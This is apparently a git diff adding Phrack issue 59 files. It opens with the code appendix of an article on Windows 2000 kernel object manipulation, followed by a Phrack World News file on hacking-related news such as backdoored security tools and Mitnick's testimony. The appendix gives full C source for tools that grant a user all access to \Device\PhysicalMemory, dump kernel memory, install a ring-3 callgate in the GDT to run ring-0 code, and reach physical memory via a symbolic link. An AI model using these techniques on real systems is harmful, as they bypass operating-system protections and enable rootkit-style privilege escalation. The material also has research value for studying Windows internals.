+                           PUNICODE_STRING TargetName);
+
+
+----[ 5.2 chmod_mem.c
+
+#include <stdio.h>
+#include <windows.h>
+#include <aclapi.h>
+#include "..\kmem.h"
+
+void usage(char *n) {
+   printf("usage: %s (/current | /user) [who]\n", n);
+   printf("/current: add all access to current user\n");
+   printf("/user   : add all access to user 'who'\n");
+   exit(0);
+}
+
+int main(int argc, char **argv) {
+   HANDLE               Section;
+   DWORD                Res;
+   NTSTATUS             ntS;
+   PACL                 OldDacl=NULL, NewDacl=NULL;
+   PSECURITY_DESCRIPTOR SecDesc=NULL;
+   EXPLICIT_ACCESS      Access;
+   OBJECT_ATTRIBUTES    ObAttributes;
+   INIT_UNICODE(ObName, L"\\Device\\PhysicalMemory");
+   BOOL                 mode;
+
+   if (argc < 2)
+      usage(argv[0]);
+
+   if (!strcmp(argv[1], "/current")) {
+      mode = 1;
+   } else if (!strcmp(argv[1], "/user") && argc == 3) {
+     mode = 2;
+   } else
+      usage(argv[0]);
+
+   memset(&Access, 0, sizeof(EXPLICIT_ACCESS));
+   InitializeObjectAttributes(&ObAttributes,
+                              &ObName,
+                              OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
+                              NULL,
+                              NULL);
+
+   // open handle de \Device\PhysicalMemory
+   ntS = NtOpenSection(&Section, WRITE_DAC | READ_CONTROL, &ObAttributes);
+   if (ntS != STATUS_SUCCESS) {
+      printf("error: NtOpenSection (code: %x)\n", ntS);
+      goto cleanup;
+   }
+   
+   // retrieve a copy of the security descriptor
+   Res = GetSecurityInfo(Section, SE_KERNEL_OBJECT, 
+                         DACL_SECURITY_INFORMATION, NULL, NULL, &OldDacl,
+                         NULL, &SecDesc);
+   if (Res != ERROR_SUCCESS) {
+      printf("error: GetSecurityInfo (code: %lu)\n", Res);
+      goto cleanup;
+   }
+
+   Access.grfAccessPermissions = SECTION_ALL_ACCESS; // :P
+   Access.grfAccessMode        = GRANT_ACCESS;
+   Access.grfInheritance       = NO_INHERITANCE;
+   Access.Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
+   // change these informations to grant access to a group or other user
+   Access.Trustee.TrusteeForm  = TRUSTEE_IS_NAME;
+   Access.Trustee.TrusteeType  = TRUSTEE_IS_USER;
+   if (mode == 1)
+      Access.Trustee.ptstrName = "CURRENT_USER";
+   else
+     Access.Trustee.ptstrName = argv[2];
+
+   // create the new ACL
+   Res = SetEntriesInAcl(1, &Access, OldDacl, &NewDacl);
+   if (Res != ERROR_SUCCESS) {
+      printf("error: SetEntriesInAcl (code: %lu)\n", Res);
+      goto cleanup;
+   }
+
+   // update ACL
+   Res = SetSecurityInfo(Section, SE_KERNEL_OBJECT,
+                         DACL_SECURITY_INFORMATION, NULL, NULL, NewDacl, 
+                         NULL);
+   if (Res != ERROR_SUCCESS) {
+      printf("error: SetEntriesInAcl (code: %lu)\n", Res);
+      goto cleanup;
+   }
+   printf("\\Device\\PhysicalMemory chmoded\n");
+   
+cleanup:
+   if (Section)
+      NtClose(Section);
+   if (SecDesc)
+      LocalFree(SecDesc);
+   return(0);
+}
+
+
+----[ 5.3 winkdump.c
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <windows.h>
+
+#include "..\kmem.h"
+
+ULONG   Granularity;
+
+// thanx to kraken for the hexdump function
+void hexdump(unsigned char *data, unsigned int amount) {
+   unsigned int      dp, p;
+   const char        trans[] =
+      "................................ !\"#$%&'()*+,-./0123456789"
+      ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+      "nopqrstuvwxyz{|}~...................................."
+      "....................................................."
+      "........................................";
+
+   for (dp = 1; dp <= amount; dp++)  {
+      printf ("%02x ", data[dp-1]);
+      if ((dp % 8) == 0)
+         printf (" ");
+      if ((dp % 16) == 0) {
+         printf ("| ");
+         p = dp;
+         for (dp -= 16; dp < p; dp++)
+            printf ("%c", trans[data[dp]]);
+         printf ("\n");
+      }
+   }
+   if ((amount % 16) != 0) {
+      p = dp = 16 - (amount % 16);
+      for (dp = p; dp > 0; dp--) {
+         printf ("   ");
+         if (((dp % 8) == 0) && (p != 8))
+            printf (" ");
+      }
+      printf (" | ");
+      for (dp = (amount - (16 - p)); dp < amount; dp++)
+         printf ("%c", trans[data[dp]]);
+   }
+   printf ("\n");
+   return ;
+}
+
+PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress) {
+   PHYSICAL_ADDRESS  add;
+   
+   if (vAddress < 0x80000000L || vAddress >= 0xA0000000L)
+      add.QuadPart = (ULONGLONG) vAddress & 0xFFFF000;
+   else
+      add.QuadPart = (ULONGLONG) vAddress & 0x1FFFF000;
+   return(add);
+}
+
+int InitSection(PHANDLE Section) {
+   NTSTATUS          ntS;
+   OBJECT_ATTRIBUTES ObAttributes;
+   INIT_UNICODE(ObString, L"\\Device\\PhysicalMemory");
+   
+   InitializeObjectAttributes(&ObAttributes,
+                              &ObString,
+                              OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
+                              NULL,
+                              NULL);
+   
+   // open \Device\PhysicalMemory
+   ntS = NtOpenSection(Section,
+                       SECTION_MAP_READ,
+                       &ObAttributes);
+   
+   if (ntS != STATUS_SUCCESS) {
+      printf(" * error NtOpenSection (code: %x)\n", ntS);
+      return(0);
+   }
+   return(1);
+}
+
+int main(int argc, char **argv) {
+   NTSTATUS         ntS;
+   ULONG            Address, Size, MappedSize, Offset;
+   HANDLE           Section;
+   PVOID            MappedAddress=NULL;
+   SYSTEM_INFO      SysInfo;
+   PHYSICAL_ADDRESS pAddress;
+   
+   printf(" *** win2k memory dumper ***\n\n");
+   
+   if (argc != 3) {
+      printf("usage: %s <address> <size>\n", argv[0]);
+      return(0);
+   }
+   
+   Address = strtoul(argv[1], NULL, 0);
+   MappedSize = Size = strtoul(argv[2], NULL, 10);
+   printf(" Virtual Address       : 0x%.8x\n", Address);
+   
+   if (!Size) {
+      printf("error: invalid size\n");
+      return(0);
+   }
+   
+   // get allocation granularity information
+   GetSystemInfo(&SysInfo);
+   Granularity = SysInfo.dwAllocationGranularity;
+   printf(" Allocation granularity: %lu bytes\n", Granularity);
+   if (!InitSection(&Section))
+      return(0);
+   
+   Offset = Address % Granularity;
+   MappedSize += Offset; // reajust mapping view
+   printf(" Offset                : 0x%x\n", Offset);
+   pAddress = GetPhysicalAddress(Address - Offset);
+   printf(" Physical Address      : 0x%.16x\n", pAddress);
+
+   ntS = NtMapViewOfSection(Section, (HANDLE) -1, &MappedAddress, 0L,
+                            MappedSize, &pAddress, &MappedSize, ViewShare,
+                            0, PAGE_READONLY);
+
+   printf(" Mapped size           : %lu bytes\n", MappedSize);
+   printf(" View size             : %lu bytes\n\n", Size);
+
+   if (ntS == STATUS_SUCCESS) {
+      hexdump((char *)MappedAddress+Offset, Size);
+      NtUnmapViewOfSection((HANDLE) -1, MappedAddress);
+   } else {
+      if (ntS == 0xC00000F4L)
+         printf("error: invalid physical address translation\n");
+      else
+         printf("error: NtMapViewOfSection (code: %x)\n", ntS);
+   }
+
+   NtClose(Section);
+   return(0);
+}
+
+
+----[ 5.2 winkps.c
+
+// code very messy but working :)
+#include <stdio.h>
+#include <windows.h>
+#include "..\kmem.h"
+
+// get this address from win2k symbols
+#define PSADD    0x8046A180 // PsActiveProcessHead
+// default base address for ntoskrnl.exe on win2k
+#define BASEADD 0x7FFE0000 // MmGetPhysicalAddress
+// max process, to prevent easy crashing
+#define MAX_PROCESS 50
+
+typedef struct _MY_CG {
+   PHYSICAL_ADDRESS     pAddress;
+   PVOID                MappedAddress;
+   PCALLGATE_DESCRIPTOR Desc;
+   WORD                 Segment;
+   WORD                 LastEntry;
+} MY_CG, *PMY_CG;
+
+ULONG         Granularity;
+PLIST_ENTRY   PsActiveProcessHead = (PLIST_ENTRY) PSADD;
+MY_CG         GdtMap;
+MAPPING       CurMap;
+
+PHYSICAL_ADDRESS (*MmGetPhysicalAddress) (PVOID BaseAddress);
+
+void __declspec(naked) Ring0Func() {
+   _asm {
+      pushad
+      pushf
+      cli
+
+      mov esi, CurMap.vAddress
+      push esi
+      call MmGetPhysicalAddress
+      mov CurMap.pAddress, eax  // save low part of LARGE_INTEGER
+      mov [CurMap+4], edx       // save high part of LARGE_INTEGER
+
+      popf
+      popad
+      retf
+   }
+}
+
+// function which call the callgate
+PHYSICAL_ADDRESS NewGetPhysicalAddress(PVOID vAddress) {
+   WORD   farcall[3];
+   HANDLE Thread = GetCurrentThread();
+
+   farcall[2] = GdtMap.Segment;
+
+   if(!VirtualLock((PVOID) Ring0Func, 0x30)) {
+      printf("error: unable to lock function\n");
+      CurMap.pAddress.QuadPart = 1;
+   } else {
+      CurMap.vAddress = vAddress; // ugly way to pass argument
+      CurMap.Offset   = (DWORD) vAddress % Granularity;
+      (DWORD) CurMap.vAddress -= CurMap.Offset;
+
+      SetThreadPriority(Thread, THREAD_PRIORITY_TIME_CRITICAL);
+      Sleep(0);
+
+      _asm call fword ptr [farcall]
+
+      SetThreadPriority(Thread,THREAD_PRIORITY_NORMAL);
+      VirtualUnlock((PVOID) Ring0Func, 0x30);
+   }
+   return(CurMap.pAddress);
+}
+
+PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress) {
+   PHYSICAL_ADDRESS  add;
+
+    if (vAddress < 0x80000000L || vAddress >= 0xA0000000L) {
+      add.QuadPart = (ULONGLONG) vAddress & 0xFFFF000;
+   } else {
+      add.QuadPart = (ULONGLONG) vAddress & 0x1FFFF000;
+   }
+   return(add);
+}
+
+void UnmapMemory(PVOID MappedAddress) {
+   NtUnmapViewOfSection((HANDLE) -1, MappedAddress);
+}
+
+int InstallCallgate(HANDLE Section, DWORD Function) {
+   NTSTATUS             ntS;
+   KGDTENTRY            gGdt;
+   DWORD                Size;
+   PCALLGATE_DESCRIPTOR CgDesc;
+
+   _asm sgdt gGdt;
+
+   printf("virtual address of GDT : 0x%.8x\n",
+          MAKE_DWORD(gGdt.BaseLow, gGdt.BaseHigh));
+   GdtMap.pAddress =
+              GetPhysicalAddress(MAKE_DWORD(gGdt.BaseLow, gGdt.BaseHigh));
+   printf("physical address of GDT: 0x%.16x\n", GdtMap.pAddress.QuadPart);
+   
+   Size = gGdt.LimitLow;
+   ntS = NtMapViewOfSection(Section, (HANDLE) -1, &GdtMap.MappedAddress,
+                            0L, Size, &GdtMap.pAddress, &Size, ViewShare,
+                            0, PAGE_READWRITE);
+   if (ntS != STATUS_SUCCESS || !GdtMap.MappedAddress) {
+      printf("error: NtMapViewOfSection (code: %x)\n", ntS);
+      return(0);
+   }
+
+   GdtMap.LastEntry = gGdt.LimitLow & 0xFFF8; // offset to last entry
+   for(CgDesc = (PVOID) ((DWORD)GdtMap.MappedAddress+GdtMap.LastEntry),
+       GdtMap.Desc=NULL;
+       (DWORD) CgDesc > (DWORD) GdtMap.MappedAddress;
+       CgDesc--) {
+      
+      //printf("present:%x, type:%x\n", CgDesc->present, CgDesc->type);
+      if(CgDesc->present == 0){
+         CgDesc->offset_0_15  = (WORD) (Function & 0xFFFF);
+         CgDesc->selector     = 8;
+         CgDesc->param_count  = 0; //1;
+         CgDesc->some_bits    = 0;
+         CgDesc->type         = 12;     // 32-bits callgate junior :>
+         CgDesc->app_system   = 0;      // A system segment
+         CgDesc->dpl          = 3;      // Ring 3 code can call
+         CgDesc->present      = 1;
+         CgDesc->offset_16_31 = (WORD) (Function >> 16);
+         GdtMap.Desc = CgDesc;
+         break;
+      }
+
+   }
+
+   if (GdtMap.Desc == NULL) {
+      printf("error: unable to find free entry for installing callgate\n");
+      printf("       not normal by the way .. your box is strange =]\n");
+   }
+
+   GdtMap.Segment =
+      ((WORD) ((DWORD) CgDesc - (DWORD) GdtMap.MappedAddress))|3;
+   printf("Allocated segment      : %x\n", GdtMap.Segment);
+   return(1);
+}
+
+int UninstallCallgate(HANDLE Section, DWORD Function) {
+   PCALLGATE_DESCRIPTOR CgDesc;
+
+   for(CgDesc = (PVOID) ((DWORD) GdtMap.MappedAddress+GdtMap.LastEntry);
+       (DWORD) CgDesc > (DWORD) GdtMap.MappedAddress;
+      CgDesc--) {
+      
+      if((CgDesc->offset_0_15 == (WORD) (Function & 0xFFFF))
+         && CgDesc->offset_16_31 == (WORD) (Function >> 16)){
+         memset(CgDesc, 0, sizeof(CALLGATE_DESCRIPTOR));
+         return(1);
+      }
+   }
+   NtUnmapViewOfSection((HANDLE) -1, GdtMap.MappedAddress);
+   return(0);
+}
+
+void UnmapVirtualMemory(PVOID vAddress) {
+   NtUnmapViewOfSection((HANDLE) -1, vAddress);
+}
+
+PVOID MapVirtualMemory(HANDLE Section, PVOID vAddress, DWORD Size) {
+   PHYSICAL_ADDRESS pAddress;
+   NTSTATUS         ntS;
+   DWORD            MappedSize;
+   PVOID            MappedAddress=NULL;
+
+   //printf("* vAddress: 0x%.8x\n", vAddress);
+   pAddress = NewGetPhysicalAddress((PVOID) vAddress);
+   //printf("* vAddress: 0x%.8x (after rounding, offset: 0x%x)\n",
+   //       CurMap.vAddress, CurMap.Offset);
+   //printf("* pAddress: 0x%.16x\n", pAddress);
+
+   // check for error (1= impossible value)
+   if (pAddress.QuadPart != 1) {
+      Size += CurMap.Offset; // adjust mapping view
+      MappedSize = Size;
+
+      ntS = NtMapViewOfSection(Section, (HANDLE) -1, &MappedAddress,
+                         0L, Size, &pAddress, &MappedSize, ViewShare,
+                         0, PAGE_READONLY);
+      if (ntS != STATUS_SUCCESS || !MappedSize) {
+         printf(" error: NtMapViewOfSection, mapping 0x%.8x (code: %x)\n",
+                vAddress, ntS);
+         return(NULL);
+      }
+   } else
+      MappedAddress = NULL;
+   printf("mapped 0x%x bytes @ 0x%.8x (init Size: 0x%x bytes)\n",
+         MappedSize, MappedAddress, Size);
+   return(MappedAddress);
+}
+
+void DisplayProcesses(HANDLE Section) {
+   int i = 0;
+   DWORD     Padding;
+   PEPROCESS CurProcess, NextProcess;
+   PVOID     vCurEntry, vOldEntry, NewMappedAddress;
+   PLIST_ENTRY PsCur;
+
+   // first we map PsActiveProcessHead to get first entry
+   vCurEntry = MapVirtualMemory(Section, PsActiveProcessHead, 4);
+   if (!vCurEntry)
+      return;
+   PsCur = (PLIST_ENTRY) ((DWORD) vCurEntry + CurMap.Offset);
+   
+   // most of EPROCESS struct are located around 0xfc[e-f]00000
+   // so we map 0x100000 bytes (~ 1mb) to avoid heavy mem mapping
+   while (PsCur->Flink != PsActiveProcessHead && i<MAX_PROCESS) {
+      NextProcess = (PEPROCESS) TO_EPROCESS(PsCur->Flink);
+      //printf("==> Current process: %x\n", CurProcess);
+
+      // we map 0x100000 bytes view so we store offset to EPROCESS
+      Padding = TO_EPROCESS(PsCur->Flink) & 0xFFFFF;
+
+      // check if the next struct is already mapped in memory
+      if ((DWORD) vCurEntry<= (DWORD) NextProcess 
+         && (DWORD)NextProcess+sizeof(EPROCESS)<(DWORD)vCurEntry+0x100000){
+         // no need to remap
+         // no remapping so we need to calculate the new address
+         CurProcess = (PEPROCESS) ((DWORD) NewMappedAddress + Padding);
+
+      } else {
+         CurProcess = NextProcess;
+         // unmap old view and map a new one
+         // calculate next base address to map
+         vOldEntry = vCurEntry;
+         vCurEntry = (PVOID) (TO_EPROCESS(PsCur->Flink) & 0xFFF00000);
+
+         //printf("link: %x, process: %x, to_map: %x, padding: %x\n",
+         //    PsCur->Flink, TO_EPROCESS(PsCur->Flink),
+         //    vCurEntry, Padding);
+
+         // unmap old view
+         UnmapVirtualMemory(vOldEntry);
+         vOldEntry = vCurEntry;
+         // map new view
+         vCurEntry = MapVirtualMemory(Section, vCurEntry, 0x100000);
+         if (!vCurEntry)
+            break;
+         // adjust EPROCESS structure pointer
+         CurProcess =
+                 (PEPROCESS) ((DWORD) vCurEntry + CurMap.Offset + Padding);
+         // save mapped address
+         NewMappedAddress = vCurEntry;
+         // restore pointer from mapped addresses space 0x4**** to
+         // the real virtual address 0xf*******
+         vCurEntry = vOldEntry;
+      }
+
+      // reajust pointer to LIST_ENTRY struct
+      PsCur = &CurProcess->ActiveProcessLinks;
+      printf(" + %lu\t %s\n", CurProcess->UniqueProcessId,
+             CurProcess->ImageFileName[0] ?
+             CurProcess->ImageFileName : "[system]");
+      i++;
+   }
+
+   UnmapVirtualMemory(vCurEntry);
+}
+
+int main(int argc, char **argv) {
+   SYSTEM_INFO       SysInfo;
+   OBJECT_ATTRIBUTES ObAttributes;
+   NTSTATUS          ntS;
+   HANDLE            Section;
+   HMODULE           hDll;
+   INIT_UNICODE(ObString, L"\\Device\\PhysicalMemory");
+
+   printf(" *** win2k process lister ***\n\n");
+
+   GetSystemInfo(&SysInfo);
+   Granularity = SysInfo.dwAllocationGranularity;
+   printf("Allocation granularity: %lu bytes\n", Granularity);
+   InitializeObjectAttributes(&ObAttributes,
+                              &ObString,
+                              OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
+                              NULL,
+                              NULL);
+
+   hDll = LoadLibrary("ntoskrnl.exe");
+   if (hDll) {
+      MmGetPhysicalAddress = (PVOID) ((DWORD) BASEADD +
+                    (DWORD) GetProcAddress(hDll, "MmGetPhysicalAddress"));
+      printf("MmGetPhysicalAddress   : 0x%.8x\n", MmGetPhysicalAddress);
+      FreeLibrary(hDll);
+   }
+
+   ntS = NtOpenSection(&Section, SECTION_MAP_READ|SECTION_MAP_WRITE,
+                       &ObAttributes);
+   if (ntS != STATUS_SUCCESS) {
+      if (ntS == STATUS_ACCESS_DENIED)
+         printf("error: access denied to open
+                                      \\Device\\PhysicalMemory for r/w\n");
+      else
+         printf("error: NtOpenSection (code: %x)\n", ntS);
+      goto cleanup;
+   }
+
+   if (!InstallCallgate(Section, (DWORD) Ring0Func))
+      goto cleanup;
+
+   memset(&CurMap, 0, sizeof(MAPPING));
+
+   __try {
+      DisplayProcesses(Section);
+   } __except(UninstallCallgate(Section, (DWORD) Ring0Func), 1) {
+      printf("exception: trying to clean callgate...\n");
+      goto cleanup;
+   }
+
+   if (!UninstallCallgate(Section, (DWORD) Ring0Func))
+      goto cleanup;
+
+cleanup:
+   if (Section)
+      NtClose(Section);
+   return(0);
+}
+
+
+----[ 5.4 fun_with_ipd.c
+
+#include <stdio.h>
+#include <conio.h>
+#include <windows.h>
+#include "..\kmem.h"
+
+int main() {
+   NTSTATUS          ntS;
+   HANDLE            SymLink, Section;
+   OBJECT_ATTRIBUTES ObAttributes;
+   INIT_UNICODE(ObName, L"\\Device\\PhysicalMemory");
+   INIT_UNICODE(ObNewName, L"\\??\\hack_da_ipd");
+
+   InitializeObjectAttributes(&ObAttributes,
+                              &ObNewName,
+                              OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
+                              NULL,
+                              NULL);
+
+   ntS = NtCreateSymbolicLinkObject(&SymLink, SYMBOLIC_LINK_ALL_ACCESS,
+                                    &ObAttributes, &ObName);
+   if (ntS != STATUS_SUCCESS) {
+      printf("error: NtCreateSymbolicLinkObject (code: %x)\n", ntS);
+      return(0);
+   }
+
+   ntS = NtOpenSection(&Section, SECTION_MAP_READ, &ObAttributes);
+   if (ntS != STATUS_SUCCESS)
+      printf("error: NtOpenSection (code: %x)\n", ntS);
+   else {
+      printf("\\Device\\PhysicalMemory opened !!!\n");
+      NtClose(Section);
+   }
+   // now you can do what you want
+   getch();
+
+   NtClose(SymLink);
+   return(0);
+}
+
+
+--[ 6 - Conclusion
+
+I hope this article helped you to understand the base of Windows kernel
+objects manipulation. As far as i know you can do as much things as you can
+with linux's /dev/kmem so there is no restriction except your imagination
+:).
+I also hope that this article will be readen by Linux dudes.
+
+Thankx to CNS, u-n-f and subk dudes, ELiCZ for some help and finally
+syn/ack oldschool people (wilmi power) =]
+
+
+--[ 7 - References
+
+[1] Sysinternals - www.sysinternals.com
+[2] Microsoft DDK - www.microsoft.com/DDK/
+[3] unofficial ntifs.h - www.insidewindows.info
+[4] www.chapeaux-noirs.org/win/
+[5] Intel IA-32 Software Developper manual - developer.intel.com
+[6] Pedestal Software - www.pedestalsoftware.com
+[7] BindView's RAZOR - razor.bindview.com
+[8] Open Systems Resources - www.osr.com
+[9] MSDN - msdn.microsoft.com
+
+books:
+  * Undocumented Windows 2000 Secrets, A Programmer's Cookbook
+    (http://www.orgon.com/w2k_internals/)
+  * Inside Microsoft Windows 2000, Third Edition
+    (http://www.microsoft.com/mspress/books/4354.asp)
+  * Windows NT/2000 Native API Reference
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/17.txt b/phrack59/17.txt
new file mode 100644
index 0000000..7e66fc0
--- /dev/null
+++ b/phrack59/17.txt
@@ -0,0 +1,519 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x11 of 0x12
+
+|=----------------=[ P H R A C K  W O R L D  N E W S ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ phrackstaff ]=---------------------------=|
+
+
+Content in Phrack World News does not reflect the opinion of any particluar
+Phrack Staff member.  PWN is exclusively done by the scene and for the
+scene.
+
+  0x01: Life sentence for hackers
+  0x02: Newest IT Job Title: Chief Hacking Officer
+  0x03: Download Sites Hacked, Source Code Backdoored
+  0x04: Mitnick testimony burns Sprint in Vegas 'vice hack' case
+  0x05: Feds may require all email to be kept by ISP's
+  0x06: BT OpenWorld silent over infection / Customers still clueless
+  0x07: DeCCS is Free Speech - CSS reverse engineer Jon Johansen set free!
+  0x08: Gnutella developer Gene Kan, 25, commits suicide
+
+
+|=[ 0x01 - Life sentence for hackers ]=----------------------------------=|
+
+July 15, 2002
+
+WASHINGTON - The House of Representatives on Monday overwhelmingly approved
+a bill that would allow for life prisin sentences for computer hackers.
+
+CNET writes that the bill has been approved by a 385-3 vote. The same bill
+expands police/agency ability to conduct Internet or telephone
+eavesdropping _without_ first obtainin a court order. The Cyber Security
+Enhancement Act (CSEA), the most wide-ranging computer crime bill to make
+its way through Congress in years, now heads to the Senate. It's not
+expected to encounter nay serious opposition.
+
+"A mouse can be just as dangerous as a bullet or a bomb." said Lamar Smith
+of R-Tex.
+
+Another section of CSEA would permit Internet providers to disclose the
+contents of e-mail messages and other electronic records (IRC, http, ..)
+to police.
+
+The Free Congress Foundation, which opposes CSEA, criticized Monday
+evening's vote.
+
+"Congress should stop chipping away at our civil liberties," sai Brad
+Jansen, an analyst at the conservative group. "A good place to start would
+be to substantially revise (CSEA) to increase, not diminish, oversight
+and accountability by the government.".
+
+http://news.com.com/2100-1001-944057.html?tag=fd_top
+http://www.msnbc.com/news/780923.asp?cp1=1
+http://www.wired.com/news/politics/0,1283,50363,00.html
+http://thomas.loc.gov/cgi-bin/bdquery/z?d107:h.r.03482:
+http://lamarsmith.house.gov/
+http://www.phrack.org/phrack/58/p58-0x0d
+http://www.freesk8.org [<---- check it out!]
+
+
+|=[ 0x02 - Newest IT Job Title: Chief Hacking Officer ]=-----------------=|
+
+By Jay Lyman
+NewsFactor Network
+
+Companies seeking to ensure they are as impervious as possible to the
+latest computer viruses and to the Internet's most talented hackers often
+find themselves in need of -- the Internet's most talented hackers.
+
+Some of these so-called "white-hat" hackers hold high positions in various
+enterprises, including security companies, but analysts told NewsFactor
+that they rarely carry the actual title "chief hacking officer" because
+companies tend to be a bit skittish about the connotation.
+
+Still, some security pros -- such as Aliso Viejo, California-based Eeye
+Security's Marc Maiffret -- do carry the "CHO" title, and few argue the
+point that in order to protect themselves from the best hackers and
+crackers, companies need to hire them.
+
+Hidden Hiring
+
+SecurityFocus senior threat analyst Ryan Russell told NewsFactor that while
+only a handful of companies actually refer to their in-house hacker as
+"chief hacking officer," many companies are hiring hackers and giving them
+titles that are slightly less indicative of their less socially acceptable
+skills.
+
+"A large number of people who used to do that sort of thing end up working
+in security," Russell said.  "There are some companies out there
+specifically saying, 'We do not hire hackers, we are against that,' but
+really they are [hiring them]."
+
+Russell said that while there is definitely an increased emphasis on
+security since last year's disastrous terrorist attacks, deflation of the
+dot-com bubble has resulted in consolidation among security personnel and a
+reduction in the number of titles that are obviously associated with
+hacking.
+
+Born To Hack
+
+Russell noted that hackers legitimately working in IT are usually
+involved in penetration testing.
+
+While companies are uncomfortable hiring IT security personnel with prior
+criminal records, there are advantages to hiring an experienced hacker,
+even if the individual has used an Internet "handle" associated with
+so-called "black-hat" hackers.
+                                                                                
+Still, Russell said, "I think in very few cases do people with the
+reputation of a hacker or black-hat [get hired]."
+                                                                                
+One such person who was hired is Cambridge, Massachusetts-based security
+company @Stake's chief scientist, Peiter "Mudge" Zatko -- well-known hacker
+and security expert who has briefed government officials, addressed
+industry forums and authored an NT password auditing tool.
+
+Regular Workers
+
+Regardless of whether they wear a white hat or a black one, Russel said it
+takes more than good hacking skills to land a legitimate job.
+
+"You want someone who does [penetrations] for a living," Russell said of
+penetration testers.  "You want them to be good at giving you the
+information you need."
+
+Russell added that while some hackers hold chief technical officer or
+equivalent positions, the rule of fewer managers and more employees means
+there are probably more hackers working in regular jobs than in management.
+
+Checking References
+
+Forrester (Nasdaq: FORR) analyst Laura Koetzle told NewsFactor that
+companies will not hire anyone convicted of a computer crime, but they will
+seek out hackers, particularly for penetration testing.
+
+"They won't have a title of chief hacking officer, and they haven't
+necessarily broken any laws, but they're still skilled at this stuff," she
+said.                                                                                
+
+Koetzle said many companies avoid the issue of checking the backgrounds of
+former hackers by using services firms, such as PricewaterhouseCoopers or
+Deloitte & Touche, to hire such personnel.
+
+Extortion and Employment
+
+But hiring hackers can backfire.
+
+Russell said cases of extortion range from blatant attempts at blackmail --
+demanding money to prevent disclosure of customer data or security
+vulnerabilities -- to more subtle efforts, wherein hackers find holes,
+offer a fix and add a request for a job.
+                                                                                
+According to Koetzle, despite the desire to keep security breaches quiet,
+companies must resist attempts on the part of potential hacker-hires to
+extort money or work in computer security.                                                                                
+
+"I would strongly caution against dealing with that type of hacker,"
+Koetzle said.  "It absolutely does happen, but it's absolutely the wrong
+thing to do."
+
+Right or wrong, however, it seems that the person best equipped to ferret
+out a hacker is another hacker.  So, as unsavory as it may seem, the better
+the hacker, the more likely he or she is to join the square world as chief
+hacking officer.
+
+
+|=[ 0x03 - Download Sites Hacked, Source Code Backdoored ]=--------------=|
+
+By Brian McWilliams
+SecurityFocus
+
+When source code to a relatively obscure, Unix-based Internet Relay Chat
+(IRC) client was reported to be "backdoored", security professionals
+collectively yawned.
+
+But last week, when three popular network security programs were reported
+to be similarly compromised, security experts sat up and took notice.
+
+Now, it appears that the two hacking incidents may have been related.
+
+According to programmer Dug Song, the source code to Dsniff, Fragroute, and
+Fragrouter security tools was contaminated on May 17th after an attacker
+gained unauthorized access to his site, Monkey.org.
+
+In an interview today, Song said affected users are being contacted, but he
+declined to provide details of the compromise, citing an ongoing
+investigation.
+
+When installed on a Unix-based machine, the modified programs open a
+backdoor accessible to a remove server hosted by RCN Corporationm according
+to an experpt of the contaminated Fragroute program posted Friday to
+Bugtraq by Ansers Nordby of the Norwegian Unix User Group.
+
+In another posting to the Bugtraq mailing list last Friday, Song reported
+that nearly 2,000 copies of the booby-trapped security programs were
+downloaded by unsuspecting Internet users before the malicious code was
+discovered.  Only 800 of the downloads were from Unix-based machines,
+according to Song.
+
+Song's subsequent Bugtraq message said that intruders planted the
+contaminated code at Monkey.org after successfully penetrating a machine
+operated by one of the site's administrators.  The attackers exploited
+"client-side hole that produced a shell to one of the local admin's
+accounts," wrote Song in his message.
+
+The exploit code planted at Monkey.org was nearly identical to a backdoor
+program that was recently slipped by attackers into the source code of the
+Irssi IRC chat client for Unix. It's is currently unclear why the attacker
+used a backdoor that could easily be detected.
+
+According to the notice posted May 25th at Irssi.org, someone "cracked" the
+distribution site for the IRC program in mid-March and altered a
+configuration script to include the back door.
+
+New Precautions Implemented
+
+Installing the compromised Irssi program provided a remove server hosted by
+FastQ Communications with full shell access to the target machine, said the
+notice.  Irssi's developer, Timo Sirainen, was not immediately available
+for comment.
+
+Today, the Web server at the Internet protocol address listed in the
+backdoored Irssi code returned the message: "All your base are belong to
+us."
+
+Meanwhile, Unknown.nu, the collocated server listed in the backdoored
+Monkey.org code, today displayed the home of the Niuean Pop Cultural
+Archive.
+
+When contacted by SecurityFocus Online, the site's administrator, Kim
+Scarborough, said he was unaware that the machine had been used by the
+Monkey.org remote exploit.
+
+Scarborough reported that he completely reinstalled the server's system
+software, including the FreeBSD operating system, on May 30th after
+discovering evidence that someone had hacked into it.
+
+According to Scarborough, he had first installed the Irssi chat client on
+the machine around May 17th at the request of a user.
+
+The two security incidents have forced authors of the affected programs to
+implement new measures to insure the authenticity of their downloadable
+code.
+
+According to a page at Irssi describing the backdoor, new releases will be
+signed with the GPG encryption tool, and the author will periodically
+review the program for changes.
+
+Song said that Monkey.org has implemented technology to restrict user
+sessions, and that he is considering adding digital signatures to software
+distributed at the site.
+
+
+|=[ 0x04 - Mitnick testimony burns Sprint in Vegas 'vice hack' case ]=---=|
+
+By Kevin Poulsen
+SecurityFocus
+
+Since adult entertainment operator Eddie Munoz first told state regulators
+in 1994 that mercenary hackers were crippling his business by diverting,
+monitoring and blocking his phone calls, officials at local telephone
+company Sprint of Nevada have maintained that, as far as they know, their
+systems have never suffered a single intrusion.
+
+The Sprint subsidiary lost that innocence Monday when convicted hacker
+Kevin Mitnick shook up a hearing on the call-tampering allegations by
+detailing years of his own illicit control of the company's Las Vegas
+switching systems, and the workings of a computerized testing system that
+he says allows silent monitoring of any phone line served by the incumbent
+telco.
+
+"I had access to most, if not all, of the switches in Las Vegas," testified
+Mitnick, at a hearing of Nevada's Public Utilities Commission (PUC).  "I
+had the same privileges as a Northern Telecom technician."                                              
+
+Mitnick's testimony played out like a surreal Lewis Carroll version of a
+hacker trial -- with Mitnick calmly and methodically explaining under oath
